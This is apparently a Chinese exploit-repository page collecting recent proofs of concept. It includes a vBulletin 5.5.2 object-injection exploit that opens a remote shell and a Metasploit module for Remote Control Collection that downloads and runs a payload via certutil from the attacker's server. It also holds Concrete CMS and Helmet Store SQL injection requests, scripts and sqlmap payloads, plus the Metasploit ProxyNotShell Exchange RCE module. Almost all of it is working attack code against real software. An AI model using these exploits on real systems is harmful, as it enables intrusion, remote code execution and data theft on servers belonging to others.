【漏洞仓库】最近发布的Poc&Exp

<?php
/*    --------------------------------------------------------------    vBulletin <= 5.5.2 (movepm) PHP Object Injection Vulnerability    --------------------------------------------------------------        author..............: Egidio Romano aka EgiX    mail................: n0b0d13s[at]gmail[dot]com    software link.......: https://www.vbulletin.com        +-------------------------------------------------------------------------+    | This proof of concept code was written for educational purpose only.    |    | Use it at your own risk. Author will be not responsible for any damage. |    +-------------------------------------------------------------------------+        [-] Vulnerability Description:          User input passed through the "messageids" request parameter to /ajax/api/vb4_private/movepm is    not properly sanitized before being used in a call to the unserialize() PHP function. This can    be exploited by malicious users to inject arbitrary PHP objects into the application scope,    allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.        [-] Technical writeup:
    http://karmainsecurity.com/exploiting-an-nday-vbulletin-php-object-injection*/
set_time_limit(0);error_reporting(E_ERROR);
if (!extension_loaded("curl")) die("[+] cURL extension required!n");
print "+------------------------------------------------------------------+";print "n| vBulletin <= 5.5.2 (movepm) PHP Object Injection Exploit by EgiX |";print "n+------------------------------------------------------------------+n";
if ($argc != 4){  print "nUsage......: php $argv[0] <URL> <Username> <Password>n";  print "nExample....: php $argv[0] http://localhost/vb/ user passwd";  print "nExample....: php $argv[0] https://vbulletin.com/ evil hackernn";  die();}
class googlelogin_vendor_autoload {} // fake class to include the autoloader
class GuzzleHttp_HandlerStack{  private $handler, $stack;    function __construct($cmd){    $this->stack = [["system"]]; // the callback we want to execute    $this->handler = $cmd; // argument for the callback  }}
class GuzzleHttp_Psr7_FnStream{  function __construct($callback){    $this->_fn_close = $callback;  }}
function make_popchain($cmd){  $pop = new GuzzleHttp_HandlerStack($cmd);  $pop = new GuzzleHttp_Psr7_FnStream([$pop, 'resolve']);
  $chain = serialize([new googlelogin_vendor_autoload, $pop]);
  $chain = str_replace(['s:', chr(0)], ['S:', '0'], $chain);  $chain = str_replace('GuzzleHttp_HandlerStack', 'GuzzleHttpHandlerStack', $chain);  $chain = str_replace('GuzzleHttp_Psr7_FnStream', 'GuzzleHttpPsr7FnStream', $chain);  $chain = str_replace('0GuzzleHttpHandlerStack', '0GuzzleHttp5CHandlerStack', $chain);    return $chain;}
list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, true);
print "[+] Logging in with username '{$user}' and password '{$pass}'n";
curl_setopt($ch, CURLOPT_URL, $url);
if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[+] Session ID not found!n");
curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login");curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}");
if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[+] Login failed!n");
print "[+] Logged-in! Retrieving security tokenn";
curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POST, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[+] Security token not found!n");
$params = ["routestring" => "ajax/api/vb4_private/movepm",           "securitytoken" => $token[1],           "folderid" => 1];
print "[+] Launching shelln";
while(1){  print "nvb-shell# ";  if (($cmd = trim(fgets(STDIN))) == "exit") break;  $params["messageids"] = make_popchain($cmd);  curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));  preg_match('/(.*){"response":/s', curl_exec($ch), $m) ? print $m[1] : die("n[+] Exploit failed!n");}

class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking   prepend Msf::Exploit::Remote::AutoCheck  include Exploit::Remote::Udp  include Exploit::EXE # generate_payload_exe  include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::FileDropper   def initialize(info = {})    super(      update_info(        info,        'Name' => 'Remote Control Collection RCE',        'Description' => %q{          This module utilizes the Remote Control Server's, part          of the Remote Control Collection by Steppschuh, protocol          to deploy a payload and run it from the server.  This module will only deploy          a payload if the server is set without a password (default).          Tested against 3.1.1.12, current at the time of module writing        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'H4rk3nz0' # edb, discovery        ],        'References' => [          [ 'URL', 'http://remote-control-collection.com' ],          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py' ]        ],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Platform' => 'win',        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          ['default', {}],        ],        'DefaultOptions' => {          'PAYLOAD' => 'windows/shell/reverse_tcp',          'WfsDelay' => 5,          'Autocheck' => false        },        'DisclosureDate' => '2022-09-20',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]        }      )    )    register_options(      [        OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1926]),        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),        OptString.new('PATH', [true, 'Where to stage payload for pull method', '%temp%\']),        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),      ]    )  end   def path    return datastore['PATH'] if datastore['PATH'].end_with? '\'     "#{datastore['PATH']}\"  end   def special_key_header    "x7fx15x02"  end   def key_header    "x7fx15x01"  end   def windows_key    udp_sock.put("#{special_key_header}x01x00x00x00xab") # key up    udp_sock.put("#{special_key_header}x00x00x00x00xab") # key down    sleep(datastore['SLEEP'])  end   def enter_key    udp_sock.put("#{special_key_header}x01x00x00x00x42")    sleep(datastore['SLEEP'])  end   def send_command(command)    command.each_char do |c|      udp_sock.put("#{key_header}#{c}")      sleep(datastore['SLEEP'] / 10)    end    enter_key    sleep(datastore['SLEEP'])  end   def check    @check_run = true    @check_success = false    upload_file    return Exploit::CheckCode::Vulnerable if @check_success     return Exploit::CheckCode::Safe  end   def on_request_uri(cli, _req)    @check_success = true    if @check_run # send a random file      p = Rex::Text.rand_text_alphanumeric(rand(8..17))    else      p = generate_payload_exe    end    send_response(cli, p)    print_good("Request received, sending #{p.length} bytes")  end   def upload_file    connect_udp    # send a space character to skip any screensaver    udp_sock.put("#{key_header} ")    print_status('Connecting and Sending Windows key')    windows_key     print_status('Opening command prompt')    send_command('cmd.exe')     filename = Rex::Text.rand_text_alphanumeric(rand(8..17))    filename << '.exe' unless @check_run    if @service_started.nil?      print_status('Starting up our web service...')      start_service('Path' => '/')      @service_started = true    end    get_file = "certutil.exe -urlcache -f http://#{srvhost_addr}:#{srvport}/ #{path}#{filename}"    send_command(get_file)    if @check_run.nil? || @check_run == true      send_command("del #{path}#{filename} && exit")    else      register_file_for_cleanup("#{path}#{filename}")      print_status('Executing payload')      send_command("#{path}#{filename} && exit")    end    disconnect_udp  end   def exploit    @check_run = false    upload_file  endend

GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/jsHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0

https://packetstormsecurity.com/files/170041/concretecms913-xpath.txt

# Exploit Title: Helmet Store Showroom  1.0 - authenticated SQL Injection# Exploit Author: syad# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 + XAMPP 3.2.4# CVE ID : N/A # Description # The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.  import requestsimport sysimport pyfigletsess = requests.Session()  proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"} def login1(ip,username,password):    x  = "http://%s/hss/classes/Login.php?f=login" % ip    login = {'username':username, 'password':password}    r = sess.post(x, data=login, proxies=proxies)    #print(r.content)   def login(ip):    x = ("http://%s/hss/admin") % ip    r = sess.get(x,proxies=proxies)    if "Welcome to Helmet Store Showroom - PHP" in r.text:        print("--------------------------------------------")        print("[+] Success Login")      def detect_sql(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip    r = sess.get(x,proxies=proxies)    if "You have an error in your SQL syntax" in r.text:        print("[+] Found SQL Error")      def time_based_sqli(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip    r = sess.get(x,proxies=proxies)    print("[+] Time Based SQL Found")    print("[*]!!! Time To Report !!!")          if __name__ == "__main__":    result = pyfiglet.figlet_format("PWN")    print(result)    try:        ip = sys.argv[1].strip()        username = sys.argv[2].strip()        password = sys.argv[3].strip()    except IndexError:        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])        print("[-] Example: %s 192.168.1.x"  % sys.argv[0])        sys.exit(-1) login1(ip,username,password)login(ip)detect_sql(ip)time_based_sqli(ip)

Parameter: id (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: p=services/view_service&id=126664801' or '5968'='5975' ORNOT 5461=5461 AND 'gEud'='gEud     Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: p=services/view_service&id=126664801' or '5968'='5975' OR(SELECT 5753 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT(ELT(5753=5753,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DEYy'='DEYy     Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=services/view_service&id=126664801' or '5968'='5975'AND (SELECT 6369 FROM (SELECT(SLEEP(5)))Rnfu) AND 'PUfi'='PUfi

https://0day.today/exploit/38082

https://packetstormsecurity.com/files/download/170070/CVE-2022-41413.tgz

https://packetstormsecurity.com/files/download/170069/CVE-2022-41412.tgz

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##
class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking
  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::CmdStager  include Msf::Exploit::Remote::HTTP::Exchange  include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell  include Msf::Exploit::EXE
  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Microsoft Exchange ProxyNotShell RCE',        'Description' => %q{          This module chains two vulnerabilities on Microsoft Exchange Server          that, when combined, allow an authenticated attacker to interact with          the Exchange Powershell backend (CVE-2022-41040), where a          deserialization flaw can be leveraged to obtain code execution          (CVE-2022-41082). This exploit only support Exchange Server 2019.
          These vulnerabilities were patched in November 2022.        },        'Author' => [          'Orange Tsai', # Discovery of ProxyShell SSRF          'Spencer McIntyre', # Metasploit module          'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis          'Piotr Bazydło', # Vulnerability analysis          'Rich Warren', # EEMS bypass via ProxyNotRelay          'Soroush Dalili' # EEMS bypass        ],        'References' => [          [ 'CVE', '2022-41040' ], # ssrf          [ 'CVE', '2022-41082' ], # rce          [ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ],          [ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ],          [ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ],          [ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ]        ],        'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08        'License' => MSF_LICENSE,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Platform' => ['windows'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => true,        'Targets' => [          [            'Windows Dropper',            {              'Platform' => 'windows',              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :windows_dropper            }          ],          [            'Windows Command',            {              'Platform' => 'windows',              'Arch' => [ARCH_CMD],              'Type' => :windows_command            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'AKA' => ['ProxyNotShell'],          'Reliability' => [REPEATABLE_SESSION]        }      )    )
    register_options([      OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),      OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),      OptString.new('DOMAIN', [ false, 'The domain to authenticate to' ])    ])
    register_advanced_options([      OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]])    ])  end
  def check    @ssrf_email ||= Faker::Internet.email    res = send_http('GET', '/mapi/nspi/')    return CheckCode::Unknown if res.nil?    return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401    return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'
    # actually run the powershell cmdlet and see if it works, this will fail if:    #   * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN)    #   * the exchange emergency mitigation service M1 rule is in place    return CheckCode::Safe unless execute_powershell('Get-Mailbox')
    CheckCode::Vulnerable  rescue Msf::Exploit::Failed => e    CheckCode::Safe(e.to_s)  end
  def ibm037(string)    string.encode('IBM037').force_encoding('ASCII-8BIT')  end
  def send_http(method, uri, opts = {})    opts[:authentication] = {      'username' => datastore['USERNAME'],      'password' => datastore['PASSWORD'],      'preferred_auth' => 'NTLM'    }
    if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1'      uri = "/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}"      opts[:headers] = {        'X-Up-Devcap-Post-Charset' => 'IBM037',        # technique needs the "UP" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362        'User-Agent' => "UP #{datastore['UserAgent']}"      }    else      uri = "/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}"    end
    super(method, uri, opts)  end
  def exploit    # if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not    # work on Exchange Server 2016    if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version)      vprint_status("Detected Exchange version: #{version}")      if version < Rex::Version.new('15.2')        fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)')      end    end
    @ssrf_email ||= Faker::Internet.email
    case target['Type']    when :windows_command      vprint_status("Generated payload: #{payload.encoded}")      execute_command(payload.encoded)    when :windows_dropper      execute_cmdstager({ linemax: 7_500 })    end  end
  def execute_command(cmd, _opts = {})    xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root      <ResourceDictionary        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"        xmlns:System="clr-namespace:System;assembly=mscorlib"        xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">        <ObjectDataProvider x:Key="LaunchCalch" ObjectType="{x:Type Diag:Process}" MethodName="Start">          <ObjectDataProvider.MethodParameters>            <System:String>cmd.exe</System:String>            <System:String>/c #{cmd.encode(xml: :text)}</System:String>          </ObjectDataProvider.MethodParameters>        </ObjectDataProvider>      </ResourceDictionary>    XAML
    identity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root      <Obj N="V" RefId="14">        <TN RefId="1">        <T>System.ServiceProcess.ServiceController</T>          <T>System.Object</T>        </TN>        <ToString>Object</ToString>        <Props>          <S N="Name">Type</S>          <Obj N="TargetTypeForDeserialization">            <TN RefId="1">              <T>System.Exception</T>              <T>System.Object</T>            </TN>            <MS>              <BA N="SerializationData">                #{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)}              </BA>            </MS>          </Obj>        </Props>        <S>          <![CDATA[#{xaml}]]>        </S>      </Obj>    IDENTITY
    execute_powershell('Get-Mailbox', args: [      { name: '-Identity', value: identity }    ])  endend
class XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream  include Msf::Util::DotNetDeserialization
  def self.generate    from_values([      Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),      Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(        class_info: Types::General::ClassInfo.new(          obj_id: 1,          name: 'System.UnitySerializationHolder',          member_names: %w[Data UnityType AssemblyName]        ),        member_type_info: Types::General::MemberTypeInfo.new(          binary_type_enums: %i[String Primitive String],          additional_infos: [ 8 ]        ),        member_values: [          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(            obj_id: 2,            string: 'System.Windows.Markup.XamlReader'          )),          4,          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(            obj_id: 3,            string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'          ))        ]      ),      Types::RecordValues::MessageEnd.new    ])  endend